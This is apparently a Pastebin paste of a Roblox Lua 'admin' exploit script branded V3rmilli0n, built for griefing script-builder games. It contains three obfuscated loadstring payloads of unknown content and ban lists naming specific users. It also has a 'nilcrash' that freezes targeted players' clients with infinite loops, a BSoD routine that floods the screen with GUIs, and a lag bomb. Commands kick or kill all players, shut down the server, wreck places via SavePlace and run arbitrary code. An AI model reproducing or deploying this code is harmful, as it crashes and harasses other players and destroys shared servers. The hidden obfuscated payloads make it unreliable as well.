Advertisement
silykev12

Untitled

Oct 24th, 2016
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 54.52 KB | None | 0 0
  1. local z={[")"]=0,["@"]=1,["*"]=2,["^"]=3,["+"]=4,["="]=5,["-"]=6,["("]=7,["~"]=8,["_"]=9,["$"]=10,["?"]=11,["&"]=12,["%"]=13,["!"]=14,["#"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  2. "((@-_-+(~*_*$)&+#-^-@-&-)=&-@-_(=-*()*%^)*(-@-%-=-$^^(=-*(-(_-^-=-~A*)=&-@-_(=-*(^(**_*!*&+#-^-@-&-)=&-@-_(=-*($)^(^-*(_-)(+(!*)=@-*(=-!-+()*%^)*#=#=#=-=^^*(%-+=@-*-^(#=#=#=$)+=@-*-^()*%^)*?(%($)^+%-+-^()*%^)*?(%($)?-=-_()*%^)A*?^**$)^-~-@-+((-=(_-)*%^)*+(*(=(=-$))(*(#-*-=-%-#-+-=-)*%^)*--@-&-^(=-$)^-#-!-!-=-^-+(_-#-!-)*%^)*!-_-&-$)*+_()(@-^(^()*%^)*--@-&-^($))*$)-=^^*(%-%+#-+-=-&-)*%^)*_+!-^(+(@-!-^-=-!*!-=-((~***%+#-+-=-&-**&*)*(=#-*(?-^()(@-^-=-_*$)-=^^*(%-%+#-+-=-&-!*!+@-%-=-)*%^)***-=+=@-*-^(**$)^=#-=(*(^-=-!+@-%-=-)*%^)***++^=#-=(*(^-=-**"
  3. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  4.  
  5. Banlist = {"d","NilScripter","OTHR"}
  6. BSoDBanList = {"rogers888","cappertron20","GOLDC3PO","rabbidog","NoobsAttacks","manofthebase44"}
  7.  
  8.  
  9. function Connect(player)
  10. if game.Players[player] then
  11. if not Players[player.Name] then
  12. NewLS(CrashSource,player.Backpack)
  13. table.insert(Players,player.Name)
  14. Output('Connected | '..player.Name,__)
  15. end
  16. end
  17. end
  18.  
  19.  
  20. function Crash(name)
  21. name = tostring(name or "nil")
  22. local t = Instance.new("StringValue")
  23. t.Name = "DISC: "..name
  24. t.Parent = game.Lighting
  25. game:GetService("Debris"):AddItem(t,1)
  26. end
  27.  
  28. ConnectSource = [=[
  29. wait()
  30. script:ClearAllChildren()
  31. wait()
  32. script.Parent = nil
  33. wait()
  34. Player = game:service'Players'.LocalPlayer
  35. wait()
  36. while wait(0.1) do --this is actually the nilcrash
  37. if game.Lighting:findFirstChild("DISC: nil") then
  38. if Player.Parent == nil then
  39. repeat Delay(0, wait) until false
  40. end
  41. end
  42. if game.Lighting:findFirstChild("DISC: "..Player.Name) then
  43. repeat Delay(0, wait) until false
  44. end
  45. if game.Lighting:findFirstChild("DISC: all") then
  46. repeat Delay(0, wait) until false
  47. end
  48. end
  49. ]=]
  50.  
  51.  
  52. BSoDSource = [==[
  53. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  54. wait(0)
  55. script.Parent = nil
  56. plr = game:GetService("Players").LocalPlayer
  57. local plrgui = plr:findFirstChild("PlayerGui")
  58. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  59. while plr.Parent == game:GetService("Players") do
  60. wait()
  61. for i = 1, 1000 do
  62. local sc = Instance.new("ScreenGui",plrgui)
  63. local fr = Instance.new("TextLabel",sc)
  64. fr.Text = "BSoD'd By V3rmilli0n be happy xd"
  65. fr.Size = UDim2.new(1, 0, 1, 0)
  66. fr.FontSize = "Size48"
  67. end
  68. end
  69. ]==]
  70.  
  71.  
  72. LagSource = [[
  73. wait()
  74. script.Parent = game:service'TeleportService'
  75. CC = workspace.CurrentCamera
  76. game:GetService('Players').LocalPlayer.CameraMode = Enum.CameraMode.LockFirstPerson
  77.  
  78. RS = game:service("RunService")
  79. PG = game.Players.LocalPlayer.PlayerGui
  80. C = game.Players.LocalPlayer.Character
  81. function Lag()
  82. coroutine.resume(coroutine.create(function()
  83. while wait() do
  84. M = Instance.new("Message",CC)
  85. M.Text = tick()*math.floor(5%4*21)
  86. H = Instance.new("Hint",CC)
  87. H.Text = 'yo u got BSoD-D By V3rmilli0n ;-)'
  88. SG=Instance.new("ScreenGui",PG)
  89. FR=Instance.new("Frame",SG)
  90. FR.Size = UDim2.new(500,500,500,500)
  91. while wait() do
  92. FR.BackgroundColor3 = Color3.new(math.random(0,255),math.random(0,255),math.random(0,255))
  93. end
  94. P=Instance.new("Part",CC)
  95. E=Instance.new("Explosion",P)
  96. E.BlastRadius=math.huge
  97. E.Position=P.Position
  98. F=Instance.new("Fire",P)
  99. S=Instance.new("Smoke",P)
  100. P.CFrame = CC.Focus
  101. P.Anchored = true
  102. P.CanCollide = false
  103. P.AncestryChanged:connect(function()Lag()end)
  104. for _,v in pairs(C:GetChildren()) do pcall(function()v.Anchored=true end) end
  105. end
  106. end))
  107. end
  108. RS.Stepped:connect(function()for i=1,10 do Lag()Lag()Lag()end end)
  109. ]]
  110.  
  111.  
  112.  
  113.  
  114. coroutine.resume(coroutine.create(function()
  115. while wait(3) do
  116. if game:GetService("Players").Name ~= "Players" then
  117. game:GetService("Players").Name = "Players"
  118. end
  119. end
  120. end))
  121.  
  122. function Dismiss()
  123. for i = 1, 10 do
  124. for i = 1, #Tabs do
  125. table.remove(Tabs, i)
  126. if V3rmModel then
  127. V3rmModel:ClearAllChildren()
  128. end end end
  129. end
  130.  
  131. function AddCmd(Name,Say,Desc,Func)
  132. table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
  133. end
  134.  
  135.  
  136.  
  137. found = false
  138.  
  139. coroutine.wrap(function()
  140. while found == false do
  141. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  142. for _,scriptinworkspace in pairs(workspace:children()) do
  143. if scriptinworkspace then
  144. if scriptinworkspace:IsA("Script") then
  145. if scriptinworkspace:FindFirstChild(SourceName) then
  146. newScript = scriptinworkspace:Clone()
  147. wait(0.2)
  148. newScript.Name = "NewScript"
  149. newScript.Disabled = true
  150. newScript:FindFirstChild(SourceName).Value = ""
  151. Output("Source found", __)
  152. found = true
  153. break
  154. end
  155. end
  156. end
  157. end
  158. wait()
  159. end
  160. end)()
  161.  
  162. AddCmd("Unpunish player","unpunish","Restore the player's character",
  163. function(plrs)
  164. for _, plr in pairs(plrs) do
  165. if plr then
  166. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  167. end
  168. end
  169. end
  170. )
  171.  
  172. function NewS(sourcevalue, parent)
  173. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  174. NS(sourcevalue, parent)
  175. else
  176. if newScript then
  177. local scr = newScript:Clone()
  178. if scr:FindFirstChild(SourceName) then
  179. if scr:FindFirstChild(SourceName) then
  180. scr:FindFirstChild(SourceName).Value = sourcevalue
  181. scr.Parent = parent
  182. wait(0.5)
  183. scr.Disabled = false
  184. return scr
  185. end
  186. end
  187. end
  188. end
  189. end
  190.  
  191. sorcery = script:Clone()
  192.  
  193.  
  194.  
  195. Services = {
  196. game;
  197. game:service'Workspace';
  198. game:service'Lighting';
  199. game:service'StarterGui';
  200. game:service'StarterPack';
  201. game:service'Players';
  202. };
  203.  
  204. AddCmd("Go nil","gn","Go to nil player mode",
  205. function()
  206. LocalPlayer.Parent = nil
  207. appear(CFrame.new(0,25,0))
  208. local a = Char:Clone()
  209. a.Torso.CFrame = CFrame.new(0,25,0)
  210. a.Parent = workspace
  211. LocalPlayer.Character = a
  212. workspace.CurrentCamera.CameraType = "Custom"
  213. workspace.CurrentCamera.CameraSubject = a.Humanoid
  214. wait(5)
  215. SmoothMovement()
  216. end
  217. )
  218.  
  219. function SmoothMovement()
  220. if char ~= nil then char = nil end
  221. wait()
  222. if LocalPlayer.Character.Parent == nil then return end
  223. if LocalPlayer.Character == nil then return end
  224. char = LocalPlayer.Character
  225. char.Torso.Anchored = true
  226. Mouse.KeyDown:connect(function(kai)
  227. if kai == "w" then
  228. key = "w"
  229. elseif kai == "s" then
  230. key = "s"
  231. elseif kai == "a" then
  232. key = "a"
  233. elseif kai == "d" then
  234. key = "d"
  235. end
  236. end)
  237. Mouse.KeyUp:connect(function(kai)
  238. if kai == "w" then
  239. key = nil
  240. elseif kai == "s" then
  241. key = nil
  242. elseif kai == "a" then
  243. key = nil
  244. elseif kai == "d" then
  245. key = nil
  246. end
  247. end)
  248. while wait() do
  249. if char == nil then break end
  250. if key == "w" then
  251. if char == nil then break end
  252. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,-0.5)
  253. elseif key == "s" then
  254. if char == nil then break end
  255. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0,0,0.5)
  256. elseif key == "a" then
  257. if char == nil then break end
  258. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(-0.5,0,0)
  259. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,0.5,0)
  260. elseif key == "d" then
  261. if char == nil then break end
  262. char.Torso.CFrame = char.Torso.CFrame * CFrame.new(0.5,0,0)
  263. char.Torso.CFrame = char.Torso.CFrame * CFrame.Angles(0,-0.5,0)
  264. end
  265. end
  266. end
  267.  
  268. AddCmd("Rejoin yourself","rjm","Rejoin yourself even if you are nil",
  269. function()
  270. if SourceName ~= "source" then
  271. game:service'TeleportService':Teleport(game.PlaceId)
  272. else
  273. end
  274. end
  275. )
  276.  
  277. function Explore(part)
  278. Dismiss()
  279. if part == nil then
  280. for _,v in pairs(Services) do
  281. Output(v.Name,nil,function() Explore(v) end)
  282. end
  283. else
  284. for _,v in pairs(part:children()) do
  285. Output(v.Name,nil,function() Explore(v) end)
  286. end
  287. wait()
  288. Output("Currently exploring: "..part.Name)
  289. Output("Class name: "..part.ClassName)
  290. Output("Destroy",function() part:Destroy() Explore(part.Parent) end)
  291. Output("Remove",function() part:remove() Explore(part.Parent) end)
  292. end
  293. end
  294.  
  295. AddCmd("Explore","explore","Explore the game",
  296. function()
  297. Explore()
  298. end
  299. )
  300.  
  301. AddCmd("Kick player","kick","Kick a player",
  302. function(plrs)
  303. for _, plr in pairs(plrs) do
  304. if plr and plr.Backpack then
  305. plr:Remove()
  306. end
  307. end
  308. end
  309. )
  310.  
  311. function NewLS(sourcevalue, parent)
  312. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  313. NLS(sourcevalue, parent)
  314. else
  315. local NS = sorcery:Clone()
  316. NS.Name = "NewLocal"
  317. local Source = NS:findFirstChild(SourceName)
  318. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  319. Source.Value = sourcevalue
  320. NS.Parent = parent
  321. NS.Disabled = false
  322. return NS
  323. end
  324. end
  325.  
  326. Clothes = {}
  327.  
  328. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  329. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  330. table.insert(Clothes,Item:Clone())
  331. end
  332. end
  333. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  334. if v:IsA("BodyColors") then
  335. body = v
  336. torsocolor = body.TorsoColor
  337. leftlegcolor = body.LeftLegColor
  338. rightlegcolor = body.RightLegColor
  339. leftarmcolor = body.LeftArmColor
  340. rightarmcolor = body.RightArmColor
  341. headcolor = body.HeadColor
  342. end
  343. end
  344.  
  345. mouse = LocalPlayer:GetMouse()
  346.  
  347. mouse.KeyDown:connect(function(key)
  348. if key == "z" then
  349. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  350. end
  351. end)
  352.  
  353. AddCmd("chat;on/off","chat","ChatGUI on/off",
  354. function(plrs, msg)
  355. if msg == "off" then
  356. chatgui = false
  357. elseif msg == "on" then
  358. chatgui = true
  359. end
  360. end
  361. )
  362.  
  363. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  364. function(plrs, msg)
  365. local keypos = msg:find(key)
  366. local targPlayers = msg:sub(1,keypos-1)
  367. local plrs = getPlayers(targPlayers)
  368. local speed = msg:sub(tonumber(keypos+1))
  369. for _,v in pairs(plrs) do
  370. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  371. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  372. end
  373. end
  374. end
  375. )
  376.  
  377.  
  378. Bad_Char = ""
  379.  
  380. function chatgui(msg)
  381. if not chatgui then return end
  382. if probemode == false then
  383. if LocalPlayer.Character:findFirstChild("Head") then
  384. mainPart = LocalPlayer.Character:findFirstChild("Head")
  385. end
  386. end
  387. if probemode == true then
  388. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  389. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  390. end
  391. end
  392. local bg = Instance.new("BillboardGui", mainPart)
  393. bg.Adornee = mainPart
  394. bg.Name = "CHATGUIBG"
  395. bg.Size = UDim2.new(4, 0, 2.5, 0)
  396. bg.StudsOffset = Vector3.new(-4, 2, 0)
  397. local bg2 = Instance.new("BillboardGui", mainPart)
  398. bg2.Adornee = mainPart
  399. bg2.Name = "CHATGUIBG2"
  400. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  401. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  402. local text = Instance.new("TextLabel", bg)
  403. text.Size = UDim2.new(3, 0, 0.5, 0)
  404. text.FontSize = "Size18"
  405. text.TextScaled = true
  406. text.BackgroundColor3 = Color3.new(0,0,0)
  407. text.TextTransparency = 0
  408. text.BackgroundTransparency = 0
  409. text.TextTransparency = 0
  410. text.TextStrokeTransparency = 0
  411. text.Font = "Arial"
  412. text.TextColor = BrickColor.new("Really red")
  413. text.Text = " "
  414. Message = msg:sub(1)
  415. if #Message >50 then return end
  416. for i = 0, #Message, 1 do
  417. wait(0.01)
  418. text.Text = string.gsub(""..LocalPlayer.Name.."; "..Message:sub(0, i),'fuck','fuck')
  419. end
  420. wait()
  421. coroutine.resume(coroutine.create(function()
  422. for i = 0, 5, 0.05 do
  423. if bg ~= nil then
  424. if bg2 ~= nil then
  425. wait()
  426. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  427. end
  428. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  429. end
  430. end
  431. end))
  432. for i=text.TextTransparency,1,0.02 do
  433. wait()
  434. text.TextTransparency = i
  435. text.TextStrokeTransparency = i
  436. end
  437. if bg == nil then return end
  438. bg:Destroy()
  439. if bg2 == nil then return end
  440. bg2:Destroy()
  441. end
  442.  
  443. LocalPlayer.Chatted:connect(chatgui)
  444.  
  445. AddCmd("Commands","cmds","Show the list of commands",
  446. function()
  447. Dismiss()
  448. for i, v in pairs(Cmds) do
  449. Output(v["Name"],
  450. function()
  451. Output("Description: "..v["Desc"], __)
  452. Output("Usage: "..v["Say"], __)
  453. Output("Name: "..v["Name"], __)
  454. end)
  455. end
  456. end
  457. )
  458.  
  459. AddCmd("Rejoin player","rej","Rejoin the player",
  460. function(plrs)
  461. for _, plr in pairs(plrs) do
  462. if plr and plr.Backpack then
  463. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  464. end
  465. end
  466. end
  467. )
  468.  
  469. AddCmd("Clean workspace","clean","Clean the lag nobs made",
  470. function()
  471. for a,b in pairs(game.Workspace:GetChildren()) do
  472. if not game.Players:GetPlayerFromCharacter(b) and b.Name ~= 'Base' and b.Name ~= 'Camera' then
  473. pcall(function() b:Destroy() end)
  474. end
  475. end
  476. if game.Workspace:findFirstChild('Base') == nil then
  477. local Base = Instance.new("Part",Game.Workspace)
  478. Base.Name = "Base"
  479. Base.Anchored = true
  480. Base.Locked = true
  481. Base.BrickColor = BrickColor.new("Bright green")
  482. Base.Size = Vector3.new(2048,2,2048)
  483. Base.CFrame = CFrame.new(0,0,0)
  484. end
  485. Output('You have cleaned workspace!')
  486. end
  487. )
  488.  
  489. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  490. function(plrs, msg)
  491. a,b = ypcall(function()
  492. loadstring(msg)()
  493. end) if not a then Output(b,"Bright red") end
  494. end
  495. )
  496.  
  497. AddCmd("Anchored", "anchor","Anchor all parts",
  498. function()
  499. g = game.Workspace:GetChildren () do
  500. for i = 1, #g do
  501. if g[i].ClassName == "Part" then
  502. g[i].Anchored = true else if
  503. g[i].ClassName == "Model" then
  504. y = g[i]:GetChildren ()
  505. for i = 1, #y do
  506. if y[i].ClassName == "Part" then
  507. y[i].Anchored = true
  508. end
  509. end
  510. end
  511. end
  512. end
  513. end
  514. end
  515. )
  516.  
  517. AddCmd("unanchor", "unanchor","unanchor all parts",
  518. function()
  519. g = game.Workspace:GetChildren () do
  520. for i = 1, #g do
  521. if g[i].ClassName == "Part" then
  522. g[i].Anchored = false else if
  523. g[i].ClassName == "Model" then
  524. y = g[i]:GetChildren ()
  525. for i = 1, #y do
  526. if y[i].ClassName == "Part" then
  527. y[i].Anchored = false
  528. end
  529. end
  530. end
  531. end
  532. end
  533. end
  534. end
  535. )
  536.  
  537. AddCmd("Admin a player","vtabs","Give admin to a player",
  538. function(plrs)
  539. for _, plr in pairs(plrs) do
  540. if plr and plr.Backpack then
  541. script.Parent = plr.Backpack
  542. Output("You gave admin to: "..plr.Name, __)
  543. end
  544. end
  545. end
  546. )
  547.  
  548. AddCmd("AFK","afk","Ping yourself as afk",
  549. function()
  550. Dismiss()
  551. for i = 1,8 do
  552. wait()
  553. Output(''..LocalPlayer.Name.." is afk")
  554. end
  555. end
  556. )
  557.  
  558. AddCmd("Back","back","Ping yourself as back",
  559. function()
  560. Dismiss()
  561. for i = 1,8 do
  562. wait()
  563. Output(''..LocalPlayer.Name.." is back bby")
  564. end
  565. wait(3)
  566. Dismiss()
  567. end
  568. )
  569.  
  570. AddCmd("Ban a player","ban","Kicks a player when he enters",
  571. function(plrs, msg)
  572. for _,v in pairs(plrs) do
  573. if v then
  574. table.insert(Banlist,v.Name)
  575. Output('Banned | '..v.Name,__)
  576. else
  577. Output(Error)
  578. end
  579. end
  580. end
  581. )
  582.  
  583. local z={["@"]=0,["*"]=1,["$"]=2,["%"]=3,[")"]=4,["("]=5,["~"]=6,["!"]=7,["-"]=8,["_"]=9,["="]=10,["+"]=11,["#"]=12,["&"]=13,["?"]=14,["^"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  584. "*))~)~%)&~)~-A$_)?A~^~$$#A$~!_~?A~^~$$#A$_~?A~^~@$@A!?~%!@$+~$$#$=@~~(!?~%~)!_~^~?~-$_$=@))_~%!&~_~%!%!-$_$=@~~^~$!@$_~@$&%@$*%#$$%@$)~^~=@!!*~_~)!-$_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-A$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@^)(!)!@!(!)!-$$$~(%%$!&~@$)(*~$~%!@$%)$!(~*~)!(~)~@$$~_!@$~(%%$!&~_~#~#~_~@%?~$$#$@$^(^(_$=@(~?~)~=@(~?~)~=@_$"
  585. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  586.  
  587. AddCmd("Fix Lighting","lfix","Fix the Lighting ",
  588. function()
  589. function dtr()
  590. local sk = game.Lighting:findFirstChild("Sky")
  591. if sk ~= nil then
  592. sk:Remove()
  593. end
  594. game.Lighting.FogEnd = 10011111111
  595. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  596. game.Lighting.TimeOfDay = "14:00:00"
  597. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  598. game.Lighting.Brightness = 1
  599. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  600. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  601. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  602. end
  603.  
  604. dtr()
  605.  
  606. game.Lighting.Changed:connect(dtr)
  607. end
  608. )
  609.  
  610. AddCmd("Kill all","ka","everyone go die die",
  611. function()
  612. for i,v in pairs(game.Players:GetChildren()) do if v.Character then v.Character:BreakJoints() end end
  613. end
  614. )
  615.  
  616. AddCmd("Set SkyBox","vbox","et Skybox l0l",
  617. function()
  618. function getAll(obj)
  619. for i, v in pairs(obj:getChildren()) do
  620. if v:IsA("BasePart") then
  621. v.Anchored = false
  622. v.BrickColor = BrickColor.new(0)
  623. bv = Instance.new("BodyVelocity")
  624. bv.Parent = v
  625. bv.maxForce = Vector3.new(100000000,100000000,100000000)
  626. local s = Instance.new("SelectionBox")
  627. s.Color = BrickColor.random()
  628. s.Adornee = v
  629. s.Parent = v
  630. s.Transparency = (0.4)
  631. end
  632. getAll(v)
  633. end
  634. end
  635. getAll(workspace)
  636. game.Lighting.TimeOfDay = "07:00:00"
  637. game.Lighting.Ambient = Color3.new(0,0,0)
  638. sky = Instance.new("Sky")
  639. sky.Parent = game.Lighting
  640. sky.SkyboxBk = "http://www.roblox.com/asset/?id=157702855"
  641. sky.SkyboxDn = "http://www.roblox.com/asset/?id=157702855"
  642. sky.SkyboxFt = "http://www.roblox.com/asset/?id=157702855"
  643. sky.SkyboxLf = "http://www.roblox.com/asset/?id=157702855"
  644. sky.SkyboxRt = "http://www.roblox.com/asset/?id=157702855"
  645. sky.SkyboxUp = "http://www.roblox.com/asset/?id=157702855"
  646. end
  647. )
  648.  
  649. local z={["&"]=0,["%"]=1,["="]=2,["!"]=3,["*"]=4,["+"]=5,["?"]=6,["-"]=7,["~"]=8,["#"]=9,["$"]=10,[")"]=11,["^"]=12,["("]=13,["_"]=14,["@"]=15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  650.  
  651. "??+-_?!?*-#?@?_?&=!?=-+?%?*-+?!+@?+-_?*?~=#A*#=$&#&!+@?+-_?*?(!#*_?!-*-%?_?!?+?_=_?+?--~A=!+@?+-_?*?==^=-*%?(?+?)+==-+@?=-)?!-&-%?!?+?==(+#=$&#&!+@?+-_?*?)+==_*%?(?+?==(+(!~A=!++?=-?-+?=-@+!+#-!-*-+?(?@+!+@?+-_?*?==#=$&#&!+@?+-_?*?)+==&+#?*-!?~?==(+(!~=%!#=$&#&!+@?+-_?*?)+==!+@?+-_?*?#**?==(+(!~===~?*-*-&-$!@=@=------_==-@?=?^?@?~-_=!?@?(?@=%?!-!-+?*-@=@!#?*?(!==_=_=*-@?_?+-(?=?+?=-~=#***#=#=$&#&!+@?+-_?*?)+==?+@?^?+-(?+?==(+(!~=&!_=+!#=$&#&--%?#?*-~=#=$&#&!+@?+-_?*?$!&+^?%?#-~=#=$&+?_?*?"
  652.  
  653. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(z[lo]+z[hi]*16)end)))),getfenv())()
  654.  
  655.  
  656.  
  657.  
  658. function ShowMusicList()
  659.  
  660. Dismiss()
  661.  
  662. Output("More Beautiful-Sad Piano Songs by Brian Crain",function()
  663.  
  664. CheckForExistingSound()
  665.  
  666. createSound(153711926)
  667.  
  668. end)
  669.  
  670. Output("iConjurer - Synch",function()
  671.  
  672. CheckForExistingSound()
  673.  
  674. createSound(145495160)
  675.  
  676. end)
  677.  
  678. Output("Piano",function()
  679.  
  680. CheckForExistingSound()
  681.  
  682. createSound(154630272)
  683.  
  684. end)
  685.  
  686. Output("The Mean Kitty Song",function()
  687.  
  688. CheckForExistingSound()
  689.  
  690. createSound(146038319)
  691.  
  692. end)
  693.  
  694. Output("Gas Pedal",function()
  695.  
  696. CheckForExistingSound()
  697.  
  698. createSound(142489916)
  699.  
  700. end)
  701.  
  702. Output("Eminem - Rap God",function()
  703.  
  704. CheckForExistingSound()
  705.  
  706. createSound(143647605)
  707.  
  708. end)
  709.  
  710. Output("Haddaway - What Is Love",function()
  711.  
  712. CheckForExistingSound()
  713.  
  714. createSound(142383642)
  715.  
  716. end)
  717.  
  718. Output("Dj Swoom - I'm Blue",function()
  719.  
  720. CheckForExistingSound()
  721.  
  722. createSound(150526348)
  723.  
  724. end)
  725.  
  726. Output("Dupstep",function()
  727.  
  728. CheckForExistingSound()
  729.  
  730. createSound(131305943)
  731.  
  732. end)
  733.  
  734. Output("Outkast - Hey Ya",function()
  735.  
  736. CheckForExistingSound()
  737.  
  738. createSound(132524706)
  739.  
  740. end)
  741.  
  742. Output("Kid Cudi - Day and Night",function()
  743.  
  744. CheckForExistingSound()
  745.  
  746. createSound(145237798)
  747.  
  748. end)
  749.  
  750. Output("Skrillex - Bangarang",function()
  751.  
  752. CheckForExistingSound()
  753.  
  754. createSound(142319852)
  755.  
  756. end)
  757.  
  758. Output("Hey Brother",function()
  759.  
  760. CheckForExistingSound()
  761.  
  762. createSound(144364636)
  763.  
  764. end)
  765.  
  766. Output("Drop That NaeNae Everyone!",function()
  767.  
  768. CheckForExistingSound()
  769.  
  770. createSound(146054931)
  771.  
  772. end)
  773.  
  774. Output("Troll Guy - Trololo",function()
  775.  
  776. CheckForExistingSound()
  777.  
  778. createSound(131857877)
  779.  
  780. end)
  781.  
  782. Output("The Pina Colada Song",function()
  783.  
  784. CheckForExistingSound()
  785.  
  786. createSound(145221203)
  787.  
  788. end)
  789.  
  790. Output("Bomb Awey",function()
  791.  
  792. CheckForExistingSound()
  793.  
  794. createSound(150137290)
  795.  
  796. end)
  797.  
  798. Output("Guns N' Roses-Paradise City",function()
  799.  
  800. CheckForExistingSound()
  801.  
  802. createSound(149446267)
  803.  
  804. end)
  805.  
  806. Output("Eminem - Not Afraid",function()
  807.  
  808. CheckForExistingSound()
  809.  
  810. createSound(131149175)
  811. end)
  812.  
  813. Output("One Direction - Story Of My Life",function()
  814.  
  815. CheckForExistingSound()
  816.  
  817. createSound(139446118)
  818.  
  819. end)
  820.  
  821. Output("Bastille - Pompeii",function()
  822.  
  823. CheckForExistingSound()
  824.  
  825. createSound(144635805)
  826.  
  827. end)
  828.  
  829. Output("M.I.A. - Paper Planes",function()
  830.  
  831. CheckForExistingSound()
  832.  
  833. createSound(146076224)
  834.  
  835. end)
  836.  
  837. Output("Muse-Madness",function()
  838.  
  839. CheckForExistingSound()
  840.  
  841. createSound(143343171)
  842.  
  843. end)
  844.  
  845. Output("Turn Down for What",function()
  846.  
  847. CheckForExistingSound()
  848.  
  849. createSound(132935524)
  850.  
  851. end)
  852.  
  853. Output("Smosh - Milky Milkshake",function()
  854.  
  855. CheckForExistingSound()
  856.  
  857. createSound(142422036)
  858.  
  859.  
  860. end)
  861.  
  862. Output("Talk Dirty ",function() CheckForExistingSound() createSound(148952593)
  863. end)
  864. end
  865. function CheckForExistingSound()
  866.  
  867. for _,Child in pairs(Game["Workspace"]:GetChildren()) do
  868.  
  869. if(Child["ClassName"]==("Sound"))then
  870.  
  871. Child:Pause()
  872.  
  873. Child["PlayOnRemove"]=(false);
  874.  
  875. wait()
  876.  
  877. Child:Destroy()
  878.  
  879. end
  880.  
  881. end
  882.  
  883. end
  884.  
  885. AddCmd("Musiclist","mlist","Shows the Possible Sounds to Play",
  886.  
  887. function()
  888.  
  889. ShowMusicList()
  890.  
  891. end)
  892.  
  893. AddCmd("Shutdown","Shutd","Shuts the server down",
  894. function()
  895. Output("Shutting down server!","Really red")
  896. for k,v in pairs(game:GetService("Players"):GetPlayers()) do v:Destroy() end
  897. game.Workspace.Terrain:Clear()
  898. wait(1)
  899. game.Workspace:ClearAllChildren()
  900. game:GetService("Players").PlayerAdded:connect(function(p) p:Destroy() end)
  901. end
  902. )
  903.  
  904. AddCmd("RuinSB","rsb","Ruins a not-saveplace protected scriptbuilder",
  905. function()
  906. if SourceName == "source" then
  907. Output("This is Alakazards scriptbuilder, can't use SavePlace here!","Really red")
  908. else
  909. NewS([[game:SavePlace()]],Workspace)
  910. end
  911. end
  912. )
  913.  
  914. AddCmd("Respawn","respawn","Respawn player",
  915. function(plrs)
  916. for _,plr in pairs(plrs) do
  917. if plr then
  918. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  919. end
  920. end
  921. end
  922. )
  923.  
  924. AddCmd("Connect","connect","Connect a player",
  925. function(plrs)
  926. for _,plr in pairs(plrs) do
  927. if plr and plr.Backpack then
  928. Connect(plr)
  929. end
  930. end
  931. end
  932. )
  933.  
  934. AddCmd("Night","night","Makes it night",
  935. function()
  936. game.Lighting.TimeOfDay = "00:00:00"
  937. end
  938. )
  939.  
  940. AddCmd("Day","day","Makes it day",
  941. function()
  942. game.Lighting.TimeOfDay = "12:00:00"
  943. end
  944. )
  945.  
  946. AddCmd("Disc","dc","Disconnects a player form the game",
  947. function(plrs)
  948. for _,plr in pairs(plrs) do
  949. if plr and plr.Backpack then
  950. NewLS([[local lp = game.Players.LocalPlayer;lp.Parent = nil;wait();lp.Parent = game.Players]],plr.Backpack)
  951. end
  952. end
  953. end)
  954.  
  955. AddCmd("LocalScript","ls","LocalScript",
  956. function(nothing, msg)
  957. if LocalPlayer.Parent ~= nil then
  958. NewLS(msg, LocalPlayer.Backpack)
  959. end
  960. end
  961. )
  962.  
